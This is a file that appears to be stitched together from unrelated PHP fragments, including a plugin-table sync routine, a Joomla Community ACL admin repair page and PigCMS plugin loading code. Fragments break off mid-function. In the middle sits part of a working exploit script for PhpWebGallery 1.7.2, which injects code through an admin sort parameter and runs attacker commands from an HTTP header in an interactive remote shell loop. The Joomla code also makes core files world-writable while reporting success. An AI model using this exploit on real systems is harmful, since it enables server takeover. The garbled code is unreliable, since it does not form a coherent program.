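/**
 * Synchronises the `{$tpf}plugins` table with the plugin directories found on disk.
 *
 * Every directory under PD_PLUGINS_DIR that passes check_plugin() ends up with
 * exactly one row: plugins that are currently active keep their action_time
 * and in_shortcut values, every other plugin is written back as inactive.
 *
 * Uses the globals $db (DB wrapper with query/fetch_array/free/escape/
 * query_unbuffered) and $tpf (table prefix).
 *
 * @return bool true when the table was rebuilt, false when the plugin
 *              directory could not be read or holds no valid plugin
 */
function syn_plugins()
{
    global $db, $tpf;
    // Plugin names found on disk.  scandir() also yields "." and "..";
    // check_plugin() is relied on to reject those (and anything else invalid).
    $arr = array();
    $dirs = scandir(PD_PLUGINS_DIR);
    if ($dirs === false) {
        return false;
    }
    sort($dirs);
    foreach ($dirs as $dir) {
        if (check_plugin($dir)) {
            $arr[] = $dir;
        }
    }
    if (!count($arr)) {
        return false;
    }
    // Row values of the plugins that are active in the DB and still exist on disk,
    // keyed by plugin name.  Initialised so the lookup below never touches an
    // undefined variable when no plugin is active.
    $active_time = array();
    $plugin_in_shortcut = array();
    $q = $db->query("select * from {$tpf}plugins where actived=1");
    while ($rs = $db->fetch_array($q)) {
        if (check_plugin($rs['plugin_name'])) {
            $active_time[$rs['plugin_name']] = $rs['action_time'];
            $plugin_in_shortcut[$rs['plugin_name']] = $rs['in_shortcut'];
        }
    }
    $db->free($q);
    unset($rs);
    // Build the VALUES list.  Every interpolated value goes through
    // $db->escape(), including the ones read back from the DB.
    $rows = array();
    foreach ($arr as $plugin_name) {
        if (array_key_exists($plugin_name, $active_time)) {
            $rows[] = "('" . $db->escape($plugin_name) . "','1','" . $db->escape($active_time[$plugin_name]) . "','" . $db->escape($plugin_in_shortcut[$plugin_name]) . "')";
        } else {
            $rows[] = "('" . $db->escape($plugin_name) . "','0','0','0')";
        }
    }
    $sql_do = implode(',', $rows);
    // Not atomic: a reader between the two statements sees an empty table.
    $db->query_unbuffered("truncate table {$tpf}plugins;");
    $db->query_unbuffered("replace into {$tpf}plugins(plugin_name,actived,action_time,in_shortcut) values {$sql_do} ;");
    return true;
}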
                $error = true;
                $sysmsg[] = $ids_arr[1];
            } else {
                $plugin_ids = $ids_arr[1];
            }
            if (!$error) {
                $db->query_unbuffered("update {$tpf}plugins set actived=0 where plugin_name in({$plugin_ids})");
                $sysmsg[] = __('plugins_inactived_success');
                redirect($_SERVER['HTTP_REFERER'], $sysmsg);
            } else {
                redirect('back', $sysmsg);
            }
        } else {
            syn_plugins();
            $sql_do = "";
            $perpage = 10;
            $rs = $db->fetch_one_array("select count(*) as total_num from {$tpf}plugins {$sql_do}");
            $total_num = $rs['total_num'];
            $start_num = ($pg - 1) * $perpage;
            $q = $db->query("select * from {$tpf}plugins {$sql_do} order by actived desc, plugin_name asc limit {$start_num},{$perpage}");
            while ($rs = $db->fetch_array($q)) {
                if (check_plugin($rs['plugin_name'])) {
                    $plugins_arr[] = get_plugin_info($rs['plugin_name']);
                }
            }
            $db->free($q);
            unset($rs);
            $page_nav = multi($total_num, $perpage, $pg, urr(ADMINCP, "item={$item}&menu=plugin&action={$action}"));
            require_once template_echo($item, $admin_tpl_dir, '', 1);
        }
}
}
print "\n+---------------------------------------------------------------------------+";
print "\n| PhpWebGallery <= 1.7.2 Session Hijacking / Code Execution Exploit by EgiX |";
print "\n+---------------------------------------------------------------------------+\n";
if ($argc < 3) {
    print "\nUsage...: php {$argv['0']} host path [sid]\n";
    print "\nhost....: target server (ip/hostname)";
    print "\npath....: path to PhpWebGallery directory";
    print "\nsid.....: a valid admin session id\n";
    die;
}
$host = $argv[1];
$path = $argv[2];
check_target();
$sid = isset($argv[3]) ? $argv[3] : get_sid();
check_plugin();
$code = "0];}error_reporting(0);print(_code_);passthru(base64_decode(\$_SERVER[HTTP_CMD]));die;%%23";
$packet = "GET {$path}admin.php?page=plugin&section=event_tracer/event_list.php&sort={$code} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: pwg_id={$sid}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";
while (1) {
    print "\nphpwebgallery-shell# ";
    $cmd = trim(fgets(STDIN));
    if ($cmd != "exit") {
        $response = http_send($host, sprintf($packet, base64_encode($cmd)));
        preg_match("/_code_/", $response) ? print array_pop(explode("_code_", $response)) : die("\n[-] Exploit failed...\n");
    } else {
        break;
    }
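/**
 * Admin task "fixit": repairs whatever hacks() reported as missing.
 *
 * Request parameters:
 *   mode  cb     - enable (code 0) or install (code -1) the cACL Community
 *                  Builder plugin
 *         joomla - enable (code 0) or install (code -1) the Community ACL
 *                  system plugin (the install steps are currently disabled)
 *         hack   - replace one core file (code 1..4) with the patched copy
 *                  shipped in the component's patch/ directory
 *   code  see above; cast to int, unknown values are reported as an error
 *
 * Always ends in a redirect to the component's "about" page.
 *
 * NOTE(review): no request token is checked, so the GET links that hacks()
 * emits can be triggered cross-site against a logged-in administrator;
 * adding JRequest::checkToken('get') requires those links to carry the token.
 */
function fixIt()
{
    global $mainframe;
    $mode = JRequest::getCmd('mode');
    $code = (int) JRequest::getCmd('code');
    $db = JFactory::getDBO();
    $about_url = 'index.php?option=com_community_acl&task=about';
    if ($mode == 'cb') {
        $code = check_cb_plugin();
        if ($code == 0) {
            // Installed but disabled: just flip the published flag.
            $db->setQuery("UPDATE `#__comprofiler_plugin` SET `published` = 1 WHERE `element` = 'cacl_usersync'");
            if ($db->query()) {
                $mainframe->redirect($about_url, JText::_('Community ACL CB plugin enabled successfully.'));
                die;
            }
            // The error lives on $db; the previous version read it from an undefined $row.
            JError::raiseError(500, $db->getErrorMsg());
        } elseif ($code == -1) {
            // Not installed: create the CB plugin directory, copy the two plugin
            // files in and register the plugin.  The steps run in order and stop
            // at the first failure so that only the failing step is reported.
            $path_src = JPATH_SITE . '/administrator/components/com_community_acl/plug_cbcacl_usersync';
            $path_dst = JPATH_SITE . '/components/com_comprofiler/plugin/user/plug_caclplugin';
            $msg = '';
            if (!is_dir($path_dst) && !@mkdir($path_dst)) {
                $msg .= 'Error: Unable create dir `.../components/com_comprofiler/plugin/user/plug_caclplugin`<br/>';
            } elseif (!@chmod($path_dst, 0775)) {
                // 0775 is sufficient: this process owns the directory it just created,
                // so it can write there without making it world-writable first.
                $msg .= 'Error: Unable chmod dir `.../components/com_comprofiler/plugin/user/plug_caclplugin`<br/>';
            } elseif (!@copy($path_src . '/cacl_usersync.php', $path_dst . '/cacl_usersync.php')) {
                $msg .= 'Error: Unable copy file `.../administrator/components/com_community_acl/plug_caclplugin/cacl_usersync.php`<br/>';
            } elseif (!@copy($path_src . '/cacl_usersync.xml', $path_dst . '/cacl_usersync.xml')) {
                $msg .= 'Error: Unable copy file `.../components/com_comprofiler/plugin/user/plug_caclplugin/cacl_usersync.xml`<br/>';
            } else {
                // Re-register: drop any stale row first so the insert cannot duplicate it.
                $db->setQuery("DELETE FROM `#__comprofiler_plugin` WHERE `element` = 'cacl_usersync';");
                $db->query();
                $db->setQuery("INSERT INTO `#__comprofiler_plugin` ( `id` , `name` , `element` , `type` , `folder` , `backend_menu` , `access` , `ordering` , `published` , `iscore` , `client_id` , `checked_out` , `checked_out_time` , `params` ) VALUES ('', 'cACL plugin', 'cacl_usersync', 'user', 'plug_caclplugin', '', '0', '0', '1', '0', '0', '0', '0000-00-00 00:00:00', '');");
                $db->query();
                if ($db->getErrorNum()) {
                    $msg .= 'Error: ' . $db->stderr() . '<br/>';
                }
            }
            if ($msg == '') {
                $mainframe->redirect($about_url, JText::_('Community ACL CB plugin installed successfully.'));
                die;
            }
            $mainframe->redirect($about_url, $msg, 'error');
        }
    } elseif ($mode == 'joomla') {
        $code = check_plugin();
        if ($code == 0) {
            // Installed but disabled: just flip the published flag.
            $db->setQuery("UPDATE `#__plugins` SET `published` = 1 WHERE `element` = 'community_acl'");
            if ($db->query()) {
                $mainframe->redirect($about_url, JText::_('Community ACL Joomla plugin enabled successfully.'));
                die;
            }
            JError::raiseError(500, $db->getErrorMsg());
        } elseif ($code == -1) {
            // Not installed.  The copy/registration steps below are disabled by the
            // "/* * /" ... "/* */" toggle, so only the chmod runs and the function then
            // falls through to the plain redirect at the end (no message, $result unused).
            $msg = '';
            $result = @chmod(JPATH_SITE . "/administrator/components/com_community_acl/joomla_plugin/community_acl.php", 0666);
            /* * /
            			if ($result)
            				$result = @chmod (JPATH_SITE. "/administrator/components/com_community_acl/joomla_plugin/community_acl.xml", 0666);
            			else
            				$msg .= 'Error: Unable chmod file `.../administrator/components/com_community_acl/joomla_plugin/community_acl.php`<br/>';
            
            			if ($result)
            				$result = @copy( JPATH_SITE. "/administrator/components/com_community_acl/joomla_plugin/community_acl.php", JPATH_SITE."/plugins/system/community_acl.php");
            			else
            				$msg .= 'Error: Unable chmod file `.../administrator/components/com_community_acl/joomla_plugin/community_acl.xml`<br/>';
            
            			if ($result)
            				$result = @copy( JPATH_SITE. "/administrator/components/com_community_acl/joomla_plugin/community_acl.xml", JPATH_SITE."/plugins/system/community_acl.xml");
            			else
            				$msg .= 'Error: Unable copy file `.../administrator/components/com_community_acl/joomla_plugin/community_acl.php`<br/>';
            
            			if ($result) {
            				$result = @copy( JPATH_SITE. "/administrator/components/com_community_acl/joomla_plugin/en-GB.plg_system_community_acl.ini", JPATH_SITE."/administrator/language/en-GB/en-GB.plg_system_community_acl.ini");
            				$result = @copy( JPATH_SITE. "/administrator/components/com_community_acl/joomla_plugin/en-GB.plg_system_community_acl.ini", JPATH_SITE."/language/en-GB/en-GB.plg_system_community_acl.ini");
            			} else
            				$msg .= 'Error: Unable copy file `.../administrator/components/com_community_acl/joomla_plugin/community_acl.xml`<br/>';
            
            			if (!$result)
            				$msg .= 'Error: Unable copy file `.../administrator/components/com_community_acl/joomla_plugin/en-GB.plg_system_community_acl.ini`<br/>';
            
            			if ($result) {
            				$db->setQuery("DELETE FROM `#__plugins` WHERE `element` = 'community_acl'");
            				$db->query();
            
            				$db->setQuery( "INSERT INTO `#__plugins` (`name`, `element`, `folder`, `access`, `ordering`, `published`, `iscore`, `client_id`, `checked_out`, `checked_out_time`, `params`) VALUES('System - Community ACL', 'community_acl', 'system', 0, 9, 1, 0, 0, 0, '0000-00-00 00:00:00', '')");
            				$db->query();
            
            				if ($db->getErrorNum()) {
            					$msg .= 'Error: '. $db->stderr() .'<br/>';
            				}
            			}
            
            			if ($msg == '') {
            				$mainframe->redirect('index.php?option=com_community_acl&task=about', JText::_('Community ACL Joomla plugin installed successfully.'));
            				die;
            			} else {
            				$mainframe->redirect('index.php?option=com_community_acl&task=about', $msg, 'error');
            			}
            			/* */
        }
    } elseif ($mode == 'hack') {
        // code => [core file relative to JPATH_SITE, file name under patch/ and backup/]
        $patches = array(
            1 => array('/administrator/modules/mod_menu/helper.php', 'mod_menu_helper.php'),
            2 => array('/modules/mod_mainmenu/helper.php', 'mod_mainmenu_helper.php'),
            3 => array('/modules/mod_mainmenu/legacy.php', 'legacy.php'),
            4 => array('/libraries/joomla/application/module/helper.php', 'module_helper.php'),
        );
        if (!isset($patches[$code])) {
            // Previously an unknown code fell through with $dst_file undefined.
            $mainframe->redirect($about_url, 'Error: Unknown patch code `' . $code . '`.', 'error');
            die;
        }
        list($rel_dst, $patch_name) = $patches[$code];
        $dst_file = JPATH_SITE . $rel_dst;
        $src_file = JPATH_SITE . '/administrator/components/com_community_acl/patch/' . $patch_name;
        $bk_file = JPATH_SITE . '/administrator/components/com_community_acl/backup/' . $patch_name;
        $success_msg = 'File `' . $dst_file . '` successfully replaced by patched version.';
        $msg = '';
        // Only this chmod is live: the backup/replace steps below are disabled by the
        // "/* * /" ... "/* */" toggle, so $msg stays empty and the success message is
        // reported even though the core file was not replaced.  Note that 0666 leaves
        // the core file world-writable and nothing restores the original mode.
        $result = @chmod($dst_file, 0666);
        /* * /
        		if ($result) {
        			@unlink($bk_file);
        			$result = @rename($dst_file, $bk_file);
        		} else
        			$msg .= 'Error: Unable chmod file `'.$dst_file.'`<br/>';
        		if ($result) {
        			$result = @copy($src_file, $dst_file);
        		} else
        			$msg .= 'Error: Unable backup file `'.$dst_file.'`<br/>';
        		if (!$result)
        			$msg .= 'Error: Unable patch(replace) file `'.$dst_file.'`<br/>';
        		/* */
        if ($msg == '') {
            $mainframe->redirect($about_url, $success_msg);
            die;
        }
        /* else {
        			$mainframe->redirect('index.php?option=com_community_acl&task=about', $msg, 'error');
        		}*/
    }
    // Unknown mode, or a branch that produced no message of its own.
    $mainframe->redirect($about_url);
}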
    /**
     * Renders the admin "hacks" status table: one row for each piece that is
     * missing or disabled (Community Builder plugin, Joomla plugin, four core
     * file patches), each with a "Fix it" link to task=fixit carrying the
     * matching mode/code.  Output is emitted directly (mixed PHP/HTML);
     * nothing is returned.
     */
    function hacks()
    {
        left_menu_header();
        $not_writable = '';
        ?>
		<table border="1" width="100%" style="background-color: #F7F8F9; border: solid 1px #d5d5d5; width: 100%; padding: 10px; border-collapse: collapse;">
		<?php 
        $msg = '';
        # - Kobby Sam: Eliminate the check for Community Builder
        // Negative codes explain why CB support is unavailable, 0 means the cACL
        // CB plugin is present but disabled; anything >= 1 produces no row.
        $cb_code = check_cb_plugin();
        switch ($cb_code) {
            case -3:
                $msg .= 'Community Builder is not detected. Please install Community Builder ver 1.1 or above and then install cACL plugin for Community Builder.';
                break;
            case -2:
                $msg .= 'Incorrect version of Community Builder. Please install Community Builder ver 1.1 or above and then install cACL plugin for Community Builder.';
                break;
            case -1:
                $msg .= 'Community ACL plugin for Community Builder is not installed.';
                break;
            case 0:
                $msg .= 'Community ACL plugin for Community Builder is installed, but not enabled.';
                break;
        }
        if ($cb_code < 1) {
            // The whole CB row below is wrapped in an HTML comment (<!--// ... //-->):
            // it is still computed and sent to the browser, but not displayed.
            ?>
			
		<!--// <tr>
			<td align="center" width="85"><?php 
            // No "Fix it" link when CB itself is missing or too old (-3/-2).
            if ($cb_code > -2) {
                ?>
<input type="button" name="install" value="Fix it" onclick="javascript: window.location.href = 'index.php?option=com_community_acl&task=fixit&mode=cb&code=<?php 
                echo $cb_code;
                ?>
'" /><?php 
            }
            ?>
</td><td style="width:auto;"><?php 
            echo $msg;
            ?>
</td>
		</tr> //-->
		<?php 
        }
        $msg = '';
        // Same scheme for the Joomla system plugin: -1 missing, 0 disabled.
        $j_code = check_plugin();
        switch ($j_code) {
            case -1:
                $msg .= 'Community ACL plugin for Joomla! is not installed.<br/>';
                break;
            case 0:
                $msg .= 'Community ACL plugin for Joomla! is installed, but not enabled.<br/>';
                break;
        }
        if ($j_code < 1) {
            ?>
	
		<tr>
			<td align="center" width="85"><input type="button" name="install" value="Fix it" onclick="javascript: window.location.href = 'index.php?option=com_community_acl&task=fixit&mode=joomla&code=<?php 
            echo $j_code;
            ?>
'" /></td><td style="width:auto;"><?php 
            echo $msg;
            ?>
</td>
		</tr>
		<?php 
        }
        // Core-file patches.  For each file check_core_file() < 1 means the patch
        // is not present: 0 gets a "Fix it" link (mode=hack, code 1..4), any other
        // value is rendered as "not writable" with manual instructions.  The
        // server path (JPATH_SITE) is printed into the HTML unescaped; it is a
        // constant, not request data.
        $mod_menu_helper = check_core_file(JPATH_SITE . DS . 'administrator' . DS . 'modules' . DS . 'mod_menu' . DS . 'helper.php');
        $not_writable = '';
        if ($mod_menu_helper < 1) {
            ?>
		<tr>
			<td align="center" width="85">
			<?php 
            if ($mod_menu_helper == 0) {
                ?>
				<input type="button" name="install" value="Fix it" onclick="javascript: window.location.href = 'index.php?option=com_community_acl&task=fixit&mode=hack&code=1'" />
			<?php 
            } else {
                $not_writable = '<br/>The `' . JPATH_SITE . DS . 'administrator' . DS . 'modules' . DS . 'mod_menu' . DS . 'helper.php' . '` file is <font color="#FF0000">not writable</font>. Please make it writable or manually replace the `' . JPATH_SITE . DS . 'administrator' . DS . 'modules' . DS . 'mod_menu' . DS . 'helper.php' . '` file with `' . JPATH_SITE . DS . 'administrator' . DS . 'components' . DS . 'com_community_acl' . DS . 'patch' . DS . 'mod_menu_helper.php`.';
                ?>
				
				<font color="#FF0000" style="font-weight:bold;">NOT WRITABLE!</font>
			<?php 
            }
            ?>
			</td><td style="width:auto;"><?php 
            echo 'Community ACL core hack in the `' . JPATH_SITE . DS . 'administrator' . DS . 'modules' . DS . 'mod_menu' . DS . 'helper.php' . '` file is not detected.' . $not_writable;
            ?>
</td>
		</tr>
		<?php 
        }
        // Same block as above for modules/mod_mainmenu/helper.php (code 2).
        $mod_mainmenu_helper = check_core_file(JPATH_SITE . DS . 'modules' . DS . 'mod_mainmenu' . DS . 'helper.php');
        $not_writable = '';
        if ($mod_mainmenu_helper < 1) {
            ?>
		<tr>
			<td align="center" width="85">
			<?php 
            if ($mod_mainmenu_helper == 0) {
                ?>
				<input type="button" name="install" value="Fix it" onclick="javascript: window.location.href = 'index.php?option=com_community_acl&task=fixit&mode=hack&code=2'" />
			<?php 
            } else {
                $not_writable = '<br/>The `' . JPATH_SITE . DS . 'modules' . DS . 'mod_mainmenu' . DS . 'helper.php' . '` file is <font color="#FF0000">not writable</font>. Please make it writable or manually replace the `' . JPATH_SITE . DS . 'modules' . DS . 'mod_mainmenu' . DS . 'helper.php' . '` file with `' . JPATH_SITE . DS . 'administrator' . DS . 'components' . DS . 'com_community_acl' . DS . 'patch' . DS . 'mod_mainmenu_helper.php`.';
                ?>
				<font color="#FF0000" style="font-weight:bold;">NOT WRITABLE!</font>
			<?php 
            }
            ?>
			</td><td style="width:auto;"><?php 
            echo 'Community ACL core hack in the `' . JPATH_SITE . DS . 'modules' . DS . 'mod_mainmenu' . DS . 'helper.php' . '` file is not detected.' . $not_writable;
            ?>
</td>
		</tr>
		<?php 
        }
        // Same block for modules/mod_mainmenu/legacy.php (code 3).
        $mod_mainmenu_legacy = check_core_file(JPATH_SITE . DS . 'modules' . DS . 'mod_mainmenu' . DS . 'legacy.php');
        $not_writable = '';
        if ($mod_mainmenu_legacy < 1) {
            ?>
		<tr>
			<td align="center" width="85">
			<?php 
            if ($mod_mainmenu_legacy == 0) {
                ?>
			<input type="button" name="install" value="Fix it" onclick="javascript: window.location.href = 'index.php?option=com_community_acl&task=fixit&mode=hack&code=3'" />
			<?php 
            } else {
                $not_writable = '<br/>The `' . JPATH_SITE . DS . 'modules' . DS . 'mod_mainmenu' . DS . 'legacy.php' . '` file is <font color="#FF0000">not writable</font>. Please make it writable or manually replace the `' . JPATH_SITE . DS . 'modules' . DS . 'mod_mainmenu' . DS . 'legacy.php' . '` file with `' . JPATH_SITE . DS . 'administrator' . DS . 'components' . DS . 'com_community_acl' . DS . 'patch' . DS . 'legacy.php`.';
                ?>
				<font color="#FF0000" style="font-weight:bold;">NOT WRITABLE!</font>
			<?php 
            }
            ?>
			</td><td style="width:auto;"><?php 
            echo 'Community ACL core hack in the `' . JPATH_SITE . DS . 'modules' . DS . 'mod_mainmenu' . DS . 'legacy.php' . '` file is not detected.' . $not_writable;
            ?>
</td>
		</tr>
		<?php 
        }
        // Same block for libraries/joomla/application/module/helper.php (code 4).
        $module_helper = check_core_file(JPATH_SITE . DS . 'libraries' . DS . 'joomla' . DS . 'application' . DS . 'module' . DS . 'helper.php');
        $not_writable = '';
        if ($module_helper < 1) {
            ?>
		<tr>
			<td align="center" width="85">
			<?php 
            if ($module_helper == 0) {
                ?>
				<input type="button" name="install" value="Fix it" onclick="javascript: window.location.href = 'index.php?option=com_community_acl&task=fixit&mode=hack&code=4'" />
			<?php 
            } else {
                $not_writable = '<br/>The `' . JPATH_SITE . DS . 'libraries' . DS . 'joomla' . DS . 'application' . DS . 'module' . DS . 'helper.php' . '` file is <font color="#FF0000">not writable</font>. Please make it writable or manually replace the `' . JPATH_SITE . DS . 'libraries' . DS . 'joomla' . DS . 'application' . DS . 'module' . DS . 'helper.php' . '` file with `' . JPATH_SITE . DS . 'administrator' . DS . 'components' . DS . 'com_community_acl' . DS . 'patch' . DS . 'module_helper.php`.';
                ?>
				<font color="#FF0000" style="font-weight:bold;">NOT WRITABLE!</font>
			<?php 
            }
            ?>
			</td><td style="width:auto;"><?php 
            echo 'Community ACL core hack in the `' . JPATH_SITE . DS . 'libraries' . DS . 'joomla' . DS . 'application' . DS . 'module' . DS . 'helper.php' . '` file is not detected.' . $not_writable;
            ?>
</td>
		</tr>
		<?php 
        }
        ?>
		</table><br />

		<?php 
        left_menu_footer();
    }
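// Global request filtering: strip a fixed set of characters from every $_GET
// value and HTML-encode what is left.  This is a blacklist applied to values
// only (keys are untouched) and is not a substitute for escaping at the sink
// (SQL parameters, paths, attribute contexts).
// NOTE(review): nested array values (?a[]=1) are passed to htmlspecialchars()
// unchanged here and are not handled as strings - confirm whether such input
// is expected before relying on this loop for them.
foreach ($_GET as &$get_value) {
    $get_value = htmlspecialchars(str_replace(array('<', '>', '\'', '"', '(', ')'), '', $get_value));
}
// Drop the reference left behind by foreach-by-reference; without this the
// next assignment to $get_value would silently overwrite the last $_GET entry.
unset($get_value);
doStripslashes();
$_G['system'] = require_file(PIGCMS_PATH . 'config/config.php');
// Site configuration comes from the F() cache; on a miss it is rebuilt from
// the Config table as name => value and written back to the cache.
$config = F('config');
if (empty($config)) {
    $config = array();
    $configs = D('Config')->field('`name`,`value`')->select();
    if (is_array($configs)) {
        foreach ($configs as $value) {
            $config[$value['name']] = $value['value'];
        }
    }
    F('config', $config);
}
$_G['config'] = $config;
defined('TPL_PATH') || define('TPL_PATH', PIGCMS_PATH . 'template/');
// Both branches read the same theme_<group>_group setting; $_G['config'] and
// $config are the same array at this point.
defined('TPL_URL') || define('TPL_URL', !IS_SUB_DIR ? $config['site_url'] . '/template/' . GROUP_NAME . '/' . $_G['config']['theme_' . GROUP_NAME . '_group'] . '/' : $config['site_url'] . '/template/' . GROUP_NAME . '/' . $config['theme_' . GROUP_NAME . '_group'] . '/');
// Active plugins: a JSON list in the config, reduced to the names that
// check_plugin() accepts, stored as name => true.
$_G['plugins'] = array();
if (!empty($_G['config']['active_plugins'])) {
    $active_plugins = json_decode($_G['config']['active_plugins'], true);
    if (is_array($active_plugins)) {
        foreach ($active_plugins as $plugin) {
            if (check_plugin($plugin) === true) {
                $_G['plugins'][$plugin] = true;
            }
        }
    }
}
if (USE_FRAMEWORK == true) {
    R(GROUP_NAME, MODULE_NAME, ACTION_NAME);
    echo ob_get_clean();
}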
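<?php

define('PIGCMS_PATH', dirname(__FILE__) . '/');
require_once PIGCMS_PATH . 'source/init.php';
// Plugin front controller.  Both request values end up inside an include
// path, so they are restricted to plain names before anything else happens:
// a missing value, a path separator, a NUL byte or ".." is rejected without
// ever reaching check_plugin() or include.
$plugin = isset($_GET['plugin']) ? (string) $_GET['plugin'] : '';
$do_plugin_file = isset($_GET['do_plugin_file']) ? (string) $_GET['do_plugin_file'] : '';
$plugin_ok = $plugin !== '' && strpbrk($plugin, "/\\\0") === false && strpos($plugin, '..') === false;
$file_ok = $do_plugin_file === '' || (strpbrk($do_plugin_file, "/\\\0") === false && strpos($do_plugin_file, '..') === false);
if ($plugin_ok && $file_ok && check_plugin($plugin)) {
    if (!empty($do_plugin_file)) {
        // Sub-file of the plugin: source/plugins/<plugin>/<plugin>_<do_plugin_file>.php
        include PIGCMS_PATH . 'source/plugins/' . $plugin . '/' . $plugin . '_' . $do_plugin_file . '.php';
    } else {
        include PIGCMS_PATH . 'source/plugins/' . $plugin . '/' . $plugin . '.php';
    }
} else {
    // The name is reflected into HTML; double_encode=false keeps values that
    // init.php may already have encoded from being encoded twice.
    pigcms_tips('站点未开启插件: <b>' . htmlspecialchars($plugin, ENT_QUOTES, 'UTF-8', false) . '</b>');
}
echo ob_get_clean();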